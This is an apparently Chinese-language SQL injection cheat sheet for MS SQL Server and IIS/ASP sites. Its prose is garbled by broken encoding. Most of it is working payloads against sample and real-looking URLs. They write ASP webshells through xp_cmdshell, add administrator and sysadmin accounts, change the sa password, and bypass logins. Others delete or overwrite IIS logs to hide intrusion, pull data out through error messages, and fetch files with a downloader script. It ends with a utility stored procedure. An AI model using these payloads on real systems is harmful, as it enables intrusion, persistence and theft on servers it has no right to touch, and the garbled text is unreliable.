SQLע
1^תַдASP(һ仰ľ)ļķ:http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
2ʾSQLϵͳ汾
http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--
3SQLпʹáinؼֽвѯ硰select * from mytable where id in(1)еֵύݣĽʹáselect * from mytable where id=1IJѯȫͬԷҳʱURLϡ) and 1=1 and 1 in(1ԭSQLͱˡselect * from mytable where id in(1) and 1=1 and 1 in(1)ͻڴѾõҳˡҾͽ͵©Ϊ͡ɣһ뵽˻Сַ͡ءˣơselect * from mytable where name in('firstsee')IJѯɵġ
4жxp_cmdshellչ洢Ƿڣ
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
5ָxp_cmdshellչ洢
http://www.test.com/news/show1.asp?NewsId=125272;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
6дкִг
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'
7鿴ǰݿƣ
http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) nij0,1,2,3ͿԿ
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
8гǰеݿƣ
select * from master.dbo.sysdatabases геļ¼
select name from master.dbo.sysdatabases гnameеļ¼
[ȡȫݿ]
select name from master.dbo.sysdatabases where dbid=7 //dbidֵΪ7϶ûݿ
[ݱ][ֵֶΪ뷨ֶεֵͿɵõ]
select top 1 name from ݿ.dbo.sysobjects where xtype='u' and status>0 and name not in('table')
[ݱֶ][ֵֶΪֶ뷨ֶεֵͿɵõֶ]
select top 1 ݿ.dbo.col_name(object_id('Ҫѯݱ'),ֶ:1) [ where ]
9xp_cmdshell֧ע©SQLCMD
------------------------------------------------------------------------ͣ
create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
--עrunIJtrueָǽȴеĽpingijʱʹô˲
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--ΪfsoopentextfileһtextstreamԴʱ@fileһ
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
drop TABLE MYTMP
-------------------------------------------------------------------------(£
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
10һ潫WEBûӵԱУ
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
11һִEXE
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
12SQLִCMDķ
ɾ7.18־
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
(3)ȿjetɳģʽͨչ洢xp_regwriteעʵ֣ԱעԤԭڰȫԭĬɳģʽδΪʲôҪxp_regwriteԭxp_regwriteҪDB_OWNERȨޣΪ˷㣬ィʹsysadminȨԣ
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
ע
0 ֹһУĬϣ
1 ʹܷACCESSǽֹ
2 ֹACCESSʹ
3 ʹһ
sysadminȨʹõ
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
ݿ'L0op8ack'ο
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'
13ʹݿ⣺
ʹʽִУǺܲңDB_OWNERȨDzģҪsysadminȨsecurityadmin+setupadminȨ
sp_addlinkedserverҪsysadminsetupadminȨ
sp_addlinkedsrvloginҪsysadminsecurityadminȨ
շ֣saȨsetupadmin+securityadminȨʻʹã
һûĸԱôͨʻȨ
ʵԲǿΪһѧϰܽ
¹£sysadminôIAS.mdbȨ֤
ҲԵʱhackerûsetupadmin+securityadminȨޣʹias.mdbʧ
Ҫһһûɷʵmdbſԣ
½ӷL0op8ack: EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
exec sp_addlinkedsrvlogin 'L0op8ack','false';--
exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
select * FROM OPENQUERY(L0op8ack, 'select shell("cmd.exe /c net user")');--
exec sp_droplinkedsrvlogin 'L0op8ack','false';--
exec sp_dropserver 'L0op8ack';--
ٿһļ7.18ļ
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
14update±еݣ
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
wwwû16λMD5ֵΪa0b923820dcc509aij1
32λMD5ֵΪ Ϊ
15ñݵļ
SQLBCPѱݵıļŵָλáܣǿȽһʱȻڱһһеһASPľȻBCPγASPļ
иʽ£
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp Cc CS localhost CU sa CP upload('S'Ϊִвѯķ'U'Ϊû'P'Ϊ룬ϴһruncommand.aspľ)
16ݺͶȡݵķ
' and 1=1 union select 1,2,3,4;create table .((255))--
ﲥݣ
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
ӱȡݣ
' and 1=(select count(*) from cyfd where gyfd >1)--
ɾʱ
';drop table cyfd;--
16ͨSQLֱӸsa룺
update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,saͱǸij111111ǺǣķǰsaɾôɾԲοҵġȫɾsaš
17 鿴еݿû
select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins
19 sasqlۺùӺִ
exec sp_password NULL,'','sa'
20ѯdvbbsеıͱṹ
select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
select * from dvbbs.dbo.syscolumns where id=1426104121
21ֹݵǰݿ⣺
ȫݣ
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT--
챸ݣ
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT
22ӺɾһSAȨûtest
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
cmd.exe /c isql -E /U alma /P /i K:\test.qry
23гChouYFDеûı
select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0
24гrdwebбеֶ
http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns where id=1234
select * from dvbbs.dbo.syscolumns where id=5575058
гdvbbsбid=5575058ֶ
25ɾ¼delete from Dv_topic where boardid=5 and topicid=7978
26ƹ¼̨֤ķ
1) ' or''='
2) ' or 1=1--
3) ' or 'a'='a--
4) 'or'='or'
5) " or 1=1--
6or 1=1--
7 or 'a='a
8" or "a"="a
9 ') or ('a'='a
10 ") or ("a"="a
11 or (1=1
12) 'or''='
13) %' and 1=1 and '%'='
27Ѱվ·ķܣ
1鿴WEBվװĿ¼
cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt 21345ԣ
type c:\test1.txt
del c:\test1.txt
NBSI¿ֱʾнԲõļ
2վҵһͼƬ 123.jpg
Ȼд123.bat:
d:
dir 123.jpg /s >c:\123.txt
e:
dir 123.jpg /s >>c:\123.txt
f:
dir 123.jpg /s >>c:\123.txt
ִк type c:\123.txt
վ·
3SQLվͬһϣǿִǰɣ
ִ
%windir%\help\iishelp\common\404b.htm500.asp
עǰBackupļ
磺
dir c:\ >%windir%\help\iishelp\common\404b.htm
Ȼһļʣhttp://Ŀip/2.asp
4win2000ϵͳxp_regreadȡHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots ȡWEB·
2003ϵͳxp_regreadȡδҵ
磺
1 ½һcyfd(ֶΪgyfd)http://www.cnwill.com/NewsShow.aspx?id=4844;create table .((255))--
2 web·дȥ:http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
3 ƥ䣬ʾ:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: varchar ֵ 'Y:\Web\̨˲ߺ̨ϵͳ,,201 ' תΪΪ int ʱ
TargeSite: Boolean Read() ·¶ˡ
4ɾ:http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--
5regeditעĽ·%windir%\help\iishelp\common\404b.htm500.aspҳ
regedit˵
Regedit /L:system /R:user /E filename.reg Regpath
壺
/LsystemָSystem.datļڵ·
/RuserָUser.datļڵ·
/E˲ָע༭Ҫеעڴ˲һ뵼עļ
RegpathָҪĸעķָ֧ȫע֧ЩУ"/Lsystem""/Ruser"ǿѡʹע༭ΪǶWINDOWSĿ¼µ"system.dat""user.dat"ļвͨDOSôͱʹ"/L""/R"ָ"system.dat""user.dat"ļľ·ע༭ҵǡ˵ͨ̽DOSע"Regedit /L:C:\windows\/R:C:\windows\/e regedit.reg",˼ǰעݵWINDOWSĿ¼£ļΪ"regedit.reg""regedit /E D:\regedit.reg"˵עݵD̵ĸĿ¼£ʡ"/L""/R"ļΪ"Regedit.reg"
regedit /s c:\adam.reg c:\adam.regļע
regedit /e c:\web.reg ȫעݵc:\web.regУ
win2000ϵͳC:\>regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
Ȼhttp://ĿIP/2.asp
win2003ϵͳûҵϣҵѹһۡ
6%SystemRoot%\system32\inetsrv\MetaBack\µļiisıļwebûʵģiisݵwebshellü±ԻȡӦweb·
7SQLע뽨Ŀ¼dboȨҲweb·һֽ취
Ǻܶ¶SQLעĿ¼ȴܲҵwebĿ¼ҲͲõõһwebshellһв
? Ŀ¼win,ָc:\winnt\system32exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
? winĿ¼нaspűȨޣexec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" Cs:'
? ɾĿ¼winexec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
? ԣhttp://127.0.0.1/win/test.asp
8SQLWEBĿ¼ݾ飬WEBĿ¼˳ǣd̡e̡c̣ǽһʱڴmaster..xp_dirtree(ʺpublic)ɵĿ¼,䣺
;create table temp(dir nvarchar(255),depth varchar(255));--,ñdirֶαʾĿ¼ƣdepthֶαʾĿ¼ȡȻִxp_dirtreeD̵Ŀ¼£
;insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:';--
ڽIJǰȲ鿴DмļУDиµ˽⣬£
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM '))>=(=0123...)
ţڶԷվҼһĿ¼userphotoȻɸѡķжWEBĿ¼Ƿڴϣ£
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)
ķؽΪ棬ʾWEBĿ¼пڴϣΪ˽һȷϣԼĿ¼
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)
...
еIJԽΪ棬ʾWEBĿ¼пڴϡ
ҵWEBĿ¼ڴϣµһĿ¼ȣ
and (select depth from temp where dir='user')>=(=123...)
õdepth3,˵userĿ¼D̵3Ŀ¼WEBĿ¼D̵ĶĿ¼
ĿǰѾ֪˸Ŀ¼ڵ̷ȣҪҵĿ¼ľλãD̸Ŀ¼ʼһѰȻûбҪ֪ÿĿ¼ƣ̫ķʱˡ
⽨һʱD̵1Ŀ¼µĿ¼£
;create table temp1(dir nvarchar(255),depth varchar(255));--
ȻѴD̵ĵһĿ¼µĿ¼浽temp1У£
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM ') order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
ȻҲD̵ĵڶĿ¼µĿ¼浽temp1Уֻѵڶtop 1Ϊtop 2ˡ
ڣtemp1ѾD̵һĿ¼µĿ¼,ȻͬķжϸĿ¼ǷڴһĿ¼£
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
Ϊ棬ʾĿ¼ڴĿ¼£סҪԼӣΪ٣WEBĿ¼ڴĿ¼£ȻͬķD̵23...Ŀ¼µĿ¼бжWEBĿ¼Ƿ¡ǣҪע⣬xp_dirtreeǰһҪtemp1еɾ
ڼ裬WEBĿ¼D̵ĵһĿ¼£Ŀ¼Ϊwebsite,Ŀ¼벻˵˰ɡΪǰ֪WEBĿ¼Ϊ2Ҫ֪websiteµĸWEBĿ¼
ڣͬķٽ3ʱ
;create table temp2(dir nvarchar(255),depth varchar(255));--
ȻѴD̵websiteµĿ¼浽temp2У£
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM ') order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
ȻҲD̵websiteµڶĿ¼µĿ¼浽temp2Уֻѵڶtop 1Ϊtop 2ˡ
ڣͬķжϸĿ¼ǷΪĿ¼
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
Ϊ棬ΪȷǵжϣԼӣ涼ˣӶΪ棬ôȷ˸Ŀ¼ΪWEBĿ¼
ϵķϿԻWEBĿ¼ǼWEBĿ¼ǣD:\website\www
ȻǾͿԱݵǰݿĿ¼ءǰǰtemptemp1temp2գȻCDE̵Ŀ¼ֱ浽temptemp1temp2С
ݿҪǵðʱdropصݿпҵеĿ¼б̨Ŀ¼ԼϢ
28win2000½WEBûΪϵͳûȨޣҪйԱȨִУ
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"
cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"
鿴Ƿɹ
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
Microsoft (R) Windows Script Host Version 5.6
Ȩ(C) Microsoft Corporation 1996-2001Ȩ
inprocessisapiapps : (LIST) (6 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"
29ASPľ
DZĿ¼mkdir images..\
ASPľĿ¼copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
ͨwebASPľhttp://ip/images../news.asp?action=login
ɾDZĿ¼rmdir images..\ /s
30ȥtenlnetntlm֤
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'
31echoдļؽűiget.vbs:
(1)echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs
(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp
32ֹIISĿ¼ķ
鿴Ŀ¼бcscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
½һkissĿ¼mkdir c:\asp\kiss
kissĿ¼cscript.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"
ΪkissĿ¼ִкдȨޣ
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
ʣhttp://127.0.0.1/kiss/test.asp
33ʹopenrowset()رԣ
select a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM ..') AS a
select * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM ..')
34
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername
35ݿû
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user
36ͨûWEBSHELLķ֮
EXEC .. 'c:\test.rar','default',1,'d:\cmd.asp'
ڵõwebshell
EXEC .. 'C:\test.rar','c:',1, 'n.asp'
ļݣҪmasterdboȨޣ
EXEC .. 1,'c:\cmd.asp'
37sa Ȩ֪web·ֱӱݿweb·
http://www.XXXX.com/FullStory.asp?id=1;backuup database ݿ to disk='c:\inetpub\wwwroot\save.db' ѵõȫݵWEBĿ¼£HTTPѴļ(ȻѡҪ֪WEBĿ¼)
ϵͳĿ¼ṹWEBĿ¼ȴһʱtemp
http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
ǿxp_availablemediaõǰ,tempУ
http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
ǿͨѯtempбϢxp_subdirsĿ¼б,tempУ
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
ǻxp_dirtreeĿ¼Ŀ¼ṹ,tempУ
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- ͿԳɹеĿ¼ļУб
Ҫ鿴ijļݣִͨxp_cmdsell;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
ʹ'bulk insert'Խһıļ뵽һʱС磺bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp' tempͿԿindex.aspļˣͨASPļԵõϵͳϢWEBϢԵõSAʺŵ롣
38һЩsqlеչ洢ܽ:
xp_availablemedia ʾϵͳϿõ̷'C:\' xp_availablemedia
xp_enumgroups гǰϵͳʹȺ鼰˵ xp_enumgroups
xp_enumdsn гϵͳѾúõODBCԴ xp_enumdsn
xp_dirtree ʾijĿ¼µĿ¼ļܹ xp_dirtree 'C:\inetpub\wwwroot\'
xp_getfiledetails ȡijļ xp_getfiledetails 'C:\inetpub\wwwroot.asp'
dbp.xp_makecab ĿѹijѹĵԽڲĺöŸ dbp.xp_makecab 'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp'
xp_unpackcab ѹ xp_unpackcab 'C:\hackway.cab','C:\temp',1
xp_ntsec_enumdomains г xp_ntsec_enumdomains
xp_servicecontrol ֹͣij xp_servicecontrol 'stop','schedule'
xp_terminate_process pidֹͣijִеij xp_terminate_process 123
dbo.xp_subdirs ֻijĿ¼µĿ¼ dbo.xp_subdirs 'C:\'
39
USE MASTER
GO
-- sp_MSforeachObject: run one to three T-SQL command strings once per object of a
-- chosen type in the current database, in the shape of the stock sp_MSforeachtable.
-- It is created in master with the sp_ prefix, so it resolves from any database.
--
-- Parameters
--   @objectType   1..12 selects the OBJECTPROPERTY() name used to filter
--                 dbo.sysobjects (see the CASE below). Any other value leaves
--                 @isobject NULL, which nulls the cursor string; not handled here.
--   @command1..3  command strings handed to sp_MSforeach_worker, which presumably
--                 substitutes @replacechar with each [owner].[object] name
--                 (TODO confirm against sp_MSforeach_worker, not shown here).
--   @replacechar  placeholder character inside the command strings, default N'?'.
--   @whereand     extra text appended verbatim to the WHERE clause of the
--                 cursor SELECT (e.g. an "and ..." fragment).
--   @precommand   executed once before the loop via exec(); NULL skips it.
--   @postcommand  executed once after the loop via exec(), only on success.
-- Returns @@error of the cursor declaration, or the worker's return value.
--
-- Security: every string parameter ends up inside dynamic SQL that runs with the
-- caller's permissions (no EXECUTE AS clause). They are code, not data; never
-- assemble them from untrusted input.
create proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each object (optionally, matching @whereand), with each object defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
-- @mscat becomes the string '2': objects with category bit 0x0002 set are excluded
-- below (presumably the Microsoft-shipped flag in sysobjects.category; verify).
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* @isobject holds the OBJECTPROPERTY() name selected by @objectType; CASE has no ELSE, so unknown values give NULL. */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
end
/* create the select */
/* Use @isobject variable instead of IsUserTable string */
-- Declares a GLOBAL cursor named hCForEach yielding bracket-quoted [owner].[object]
-- names; REPLACE(..., N']', N']]') doubles closing brackets so names cannot break
-- out of the quoting. The cursor is consumed (and, presumably, deallocated) by
-- sp_MSforeach_worker. NOTE(review): with @whereand NULL the concatenation is NULL
-- under CONCAT_NULL_YIELDS_NULL; this relies on EXEC() tolerating that -- confirm.
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
-- @@error must be read immediately after the EXEC; any later statement resets it.
select @retval = @@error
if (@retval = 0)
exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
-- @postcommand runs only if both the cursor declaration and the worker succeeded.
if (@retval = 0 and @postcommand is not null)
exec(@postcommand)
return @retval
GO
/*
1еĴ洢̵Ľű
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2еͼĽű
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
